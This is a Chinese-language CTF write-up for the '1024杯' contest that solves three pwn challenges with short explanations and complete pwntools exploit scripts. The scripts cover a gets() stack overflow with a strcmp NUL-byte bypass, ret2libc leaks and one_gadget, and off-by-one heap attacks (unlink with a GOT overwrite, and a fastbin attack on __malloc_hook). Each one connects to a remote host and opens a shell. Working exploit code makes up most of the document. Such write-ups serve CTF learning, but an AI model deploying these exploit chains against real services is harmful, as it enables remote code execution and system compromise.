
1024杯

5f87fd071a777.jpg

1024_happy_stack

发现程序存在 gets 函数,用 '36D'+'\x00' 绕过 strcmp(strcmp 比到 NUL 就停止,而 gets 会继续往后写),然后溢出覆盖返回地址,先泄露 libc,再用同样的方法返回到 one_gadget 来 getshell。一开始用 system 函数,发现一直出错,最后直接不管了,one_gadget 一把梭。提交完群里师傅说可以多加一个 ret 进行栈对齐,学到了,学到了。补充:调用 system 时 rsp 需要 16 字节对齐(一般是因为 glibc 的 do_system 里有要求对齐的 movaps 指令,不对齐就会崩溃),在 ROP 链里 system 前面多放一个 ret 地址即可;pop_rdi_ret+1 处就是一个单独的 ret。

exp如下:

#! /usr/bin/env python

from pwn import *
from LibcSearcher import *

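#sh=process('./pwn1')
sh = remote('111.231.70.44', 28018)
elf = ELF('./pwn1')
# libc build the remote was identified as; the one_gadget offset below is
# specific to it.
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
context.log_level = 'debug'

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x00000000004005A0     # re-enter main so we get a second overflow
pop_rdi_ret = 0x0000000000400803   # pop rdi ; ret

# Stage 1: leak puts@libc.  '36D\0' passes the strcmp (it stops at the NUL)
# while gets() keeps writing past it; 0x384 bytes of filler reach the saved
# return address.  Payloads are bytes so the script also runs under Python 3
# pwntools (str + p64() would raise TypeError there).
payload = b'36D' + b'\x00' + b'a' * 0x384
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

sh.sendline(payload)
sh.recvuntil(b'36D\n')
puts_addr = u64(sh.recv(6).ljust(8, b'\x00'))
sh.success('puts_addr : ' + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
sh.success('libc_base : ' + hex(libc_base))
if libc_base & 0xfff:
    # Raises PwnlibException: a base that is not page aligned means the wrong
    # libc or a garbled leak, and a bogus one_gadget would only crash the
    # service.
    sh.error('libc_base is not page aligned, wrong libc or bad leak')
# one_gadget for libc6_2.27-3ubuntu1.  The all-zero filler in stage 2 is
# presumably there to satisfy the gadget's NULL-stack constraint -- confirm
# with one_gadget if a different offset is used.
one_gadget = libc_base + 0x4f2c5

# Stage 2: same overflow, return straight into the one_gadget.
payload = b'36D' + b'\x00' + b'\x00' * 0x384
payload += p64(one_gadget)

sleep(0.5)
sh.sendline(payload)
sh.interactive()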

1024_happy_checkin

和第一题一样的做法(只是没有 '36D' 前缀,先填充 0x370 字节到 rbp、再 8 字节到返回地址),one_gadget 一把梭。

exp如下:

#! /usr/bin/env python

from pwn import *
from LibcSearcher import *

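#sh=process('./pwn2')
sh = remote('111.231.70.44', 28028)
elf = ELF('./pwn2')
# libc build the remote was identified as; the one_gadget offset below is
# specific to it.
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
context.log_level = 'debug'

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x00000000004005F7     # re-enter main so we get a second overflow
pop_rdi_ret = 0x00000000004006e3   # pop rdi ; ret

# Stage 1: 0x370 bytes of filler reach the saved rbp, 8 more reach the return
# address, then puts(puts@got) and back to main.  Bytes literals keep the
# script working under Python 3 pwntools (str + p64() raises there).
payload = b'a' * 0x370 + b'b' * 8
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
sh.sendline(payload)
# The target evidently echoes the buffer back, so wait for the 'b' marker and
# then scan up to the 0x7f byte of the userland libc pointer; this tolerates
# stray output better than a fixed recv(6).
sh.recvuntil(b'b' * 8)
puts_addr = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
sh.success('puts_addr : ' + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
sh.success('libc_base : ' + hex(libc_base))
if libc_base & 0xfff:
    # Raises PwnlibException: misaligned base = wrong libc or bad leak; do not
    # fire a bogus one_gadget at the service.
    sh.error('libc_base is not page aligned, wrong libc or bad leak')
one_gadget = libc_base + 0x4f2c5   # one_gadget for libc6_2.27-3ubuntu1

# Stage 2: same overflow, return straight into the one_gadget.
payload = b'a' * 0x370 + b'a' * 8
payload += p64(one_gadget)

sleep(0.5)
sh.sendline(payload)
sh.interactive()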

程序存在 off by one 漏洞,伪造 fake_chunk,触发 unlink,然后修改 chunk_ptr 为 got 地址,通过 show 函数泄露 libc,修改 free_got 为 system_addr,再次 free 装有 /bin/sh 的 chunk 就会 getshell。需要注意的是,在做题的时候,我用题目给的 libc,远程一直打不通,最后根据泄露的 got 地址(free 的地址)在网上查到对应的 libc(libc6_2.23-0ubuntu10,下面第二种解法里直接加载了这个文件)才得以打通,感觉题目给的 libc 可能有问题。

exp如下:

#! /usr/bin/env python

from pwn import *

#sh=process('./pwn3')
# The target binary (for got/plt addresses) is loaded before the connection
# is opened; the libc line stays disabled because this exploit works with
# hard-coded libc offsets instead.
elf = ELF('./pwn3')
sh = remote('111.231.70.44', 28048)
context.log_level = 'debug'
#libc=ELF('./libc.so.6')

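def add(index, size):
    """Menu choice '1': allocate a chunk of ``size`` bytes in slot ``index``.

    Uses the module-level tube ``sh``.  Only the size is sent here; contents
    are written afterwards with edit().  ``size`` is stringified, so a str
    argument is sent verbatim.  Prompts are matched as bytes so the helper
    works under both Python 2 and Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'1')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.sendline(str(size).encode())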

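def free(index):
    """Menu choice '2': free the chunk in slot ``index``.

    Uses the module-level tube ``sh``.  Prompts are matched as bytes so the
    helper works under both Python 2 and Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'2')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())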

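def show(index):
    """Menu choice '3': print the contents of slot ``index``.

    Uses the module-level tube ``sh``; the caller reads the output itself.
    Prompts are matched as bytes so the helper works under both Python 2 and
    Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'3')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())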

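def edit(index, content):
    """Menu choice '4': overwrite slot ``index`` with ``content``.

    Uses the module-level tube ``sh``.  ``content`` is sent raw with send()
    (no trailing newline), so it must already be bytes and of the exact
    length the caller intends.  Prompts are matched as bytes so the helper
    works under both Python 2 and Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'4')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.send(content)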

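# .bss slot that stores the pointer for index 1.  The fake chunk's fd/bk are
# chosen so unlink()'s FD->bk == P and BK->fd == P checks pass, after which
# the slot is overwritten with FD = chunk_ptr-0x18, i.e. a pointer into the
# pointer table itself.
chunk_ptr = 0x6020f0
fd = chunk_ptr - 0x18
bk = chunk_ptr - 0x10
free_got = elf.got['free']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

add(0, 0x60)
add(1, 0x88)   # 0x90 chunk that will host the fake chunk
add(2, 0x80)   # 0x90 chunk whose prev_size/size get tampered below
# NOTE(review): this passes the string "/bin/sh\0" as the *size* -- add() only
# takes a size, the content is written by edit(3, ...) further down.  It
# evidently worked against the remote, but add(3, 0x10) as in the second
# exploit is what was meant; confirm before reusing.
add(3, '/bin/sh\x00')
# Fake free chunk (size 0x81) at the start of chunk 1's data, then chunk 2's
# prev_size = 0x80 and, via the one-byte overflow, its size byte 0x91 -> 0x90
# (PREV_INUSE cleared) so free(2) consolidates backwards into the fake chunk.
# Bytes literals keep this running under Python 3 pwntools as well.
edit(1, p64(0) + p64(0x81) + p64(fd) + p64(bk) + b'a' * 0x60 + p64(0x80) + b'\x90')
free(2)
# Slot 1 now points at chunk_ptr-0x18, so this write lands on the pointer
# table: slot 0 ends up pointing at free@got (leaked via show, written via
# edit).  The exact slot layout is inferred from these offsets -- confirm in
# the binary.
edit(1, b'a' * 8 + p64(free_got) + p64(puts_got))
show(0)
free_addr = u64(sh.recv(6).ljust(8, b'\x00'))
sh.success('free_addr : ' + hex(free_addr))

# Hard-coded free/system offsets; they appear to match the
# libc6_2.23-0ubuntu10 build that the heap-overlap exploit loads explicitly
# (the libc shipped with the task did not match the remote).
libc_base = free_addr - 0x0844f0
sh.success('libc_base : ' + hex(libc_base))
if libc_base & 0xfff:
    # Raises PwnlibException: misaligned base = wrong libc or bad leak.
    sh.error('libc_base is not page aligned, wrong libc or bad leak')
system_addr = libc_base + 0x045390
sh.success('system_addr : ' + hex(system_addr))

edit(0, p64(system_addr))   # free@got = system
edit(3, b'/bin/sh\x00')
free(3)                     # free("/bin/sh") -> system("/bin/sh")

#gdb.attach(sh)
sh.interactive()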

这里我还用了另一种方法,可能是非预期解?

通过 off by one 漏洞修改下一个 chunk 的 size,造成堆重叠,然后借助 unsorted bin 里残留的 fd/bk 泄露 libc,之后用 fastbin attack 把 chunk 申请到 __malloc_hook 附近(常用的 malloc_hook-0x23 处的伪 0x7f chunk),写入 one_gadget 后再 malloc 一次来 getshell。

exp如下:

#! /usr/bin/env python

from pwn import *

#sh=process('./pwn3')
# Binary and the libc the remote was matched to (libc6_2.23-0ubuntu10) are
# loaded before the connection is opened.
# NOTE(review): this connects to port 28016 while the unlink exploit for the
# same pwn3 uses 28048 -- check which one is the live instance.
elf = ELF('./pwn3')
libc = ELF('./libc6_2.23-0ubuntu10_amd64.so')
sh = remote('111.231.70.44', 28016)
context.log_level = 'debug'

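def add(index, size):
    """Menu choice '1': allocate a chunk of ``size`` bytes in slot ``index``.

    Uses the module-level tube ``sh``.  Only the size is sent here; contents
    are written afterwards with edit().  Prompts are matched as bytes so the
    helper works under both Python 2 and Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'1')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.sendline(str(size).encode())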

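def free(index):
    """Menu choice '2': free the chunk in slot ``index``.

    Uses the module-level tube ``sh``.  Prompts are matched as bytes so the
    helper works under both Python 2 and Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'2')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())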

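def show(index):
    """Menu choice '3': print the contents of slot ``index``.

    Uses the module-level tube ``sh``; the caller reads the output itself.
    Prompts are matched as bytes so the helper works under both Python 2 and
    Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'3')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())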

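def edit(index, content):
    """Menu choice '4': overwrite slot ``index`` with ``content``.

    Uses the module-level tube ``sh``.  ``content`` is sent raw with send()
    (no trailing newline), so it must already be bytes and of the exact
    length the caller intends -- the off-by-one below depends on that.
    Prompts are matched as bytes so the helper works under both Python 2 and
    Python 3 pwntools.
    """
    sh.recvuntil(b': ')
    sh.sendline(b'4')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.send(content)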

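add(0, 0x18)
add(1, 0x60)
add(2, 0x60)
add(3, 0x10)   # presumably keeps the chunks above away from the top chunk
# One-byte overflow out of chunk 0 into chunk 1's size field: 0x71 -> 0xe1,
# so chunk 1 now appears to span chunks 1 and 2 (0x70 + 0x70).  Bytes
# literals keep this running under Python 3 pwntools as well.
edit(0, b'a' * 0x18 + b'\xe1')
free(1)        # 0xe0 is too big for a fastbin -> lands in the unsorted bin
add(4, 0x60)   # split: the 0x70 remainder overlaps chunk 2 and now carries
               # unsorted-bin fd/bk pointing at main_arena+88
show(2)
main_arena = u64(sh.recv(6).ljust(8, b'\x00')) - 88
sh.success('main_arena : ' + hex(main_arena))
libc_base = main_arena - 0x3c4b20   # main_arena offset in libc6_2.23-0ubuntu10
sh.success('libc_base : ' + hex(libc_base))
if libc_base & 0xfff:
    # Raises PwnlibException: misaligned base = wrong libc or bad leak; do not
    # corrupt __malloc_hook with a bogus address.
    sh.error('libc_base is not page aligned, wrong libc or bad leak')
malloc_hook = libc_base + libc.symbols['__malloc_hook']
sh.success('malloc_hook : ' + hex(malloc_hook))
one_gadget = libc_base + 0xf1147    # one_gadget for this libc build

# Fastbin attack: chunk 5 is carved from the remainder (same memory as chunk
# 2, which is why the stale index 2 can edit it after free), freed into the
# 0x70 fastbin, and its fd redirected to the usual fake 0x7f-sized chunk just
# below __malloc_hook.
add(5, 0x60)
free(5)
edit(2, p64(malloc_hook - 0x23))
add(6, 0x60)
add(7, 0x60)   # returned at malloc_hook-0x13
# 3 + 8 + 8 = 0x13 bytes of padding put one_gadget exactly on __malloc_hook.
edit(7, b'a' * 3 + p64(0) * 2 + p64(one_gadget))

# Any malloc() now goes through __malloc_hook -> one_gadget; this is the same
# menu sequence the helper sends, so reuse it instead of spelling it out.
add(1, 0x20)

#gdb.attach(sh)
sh.interactive()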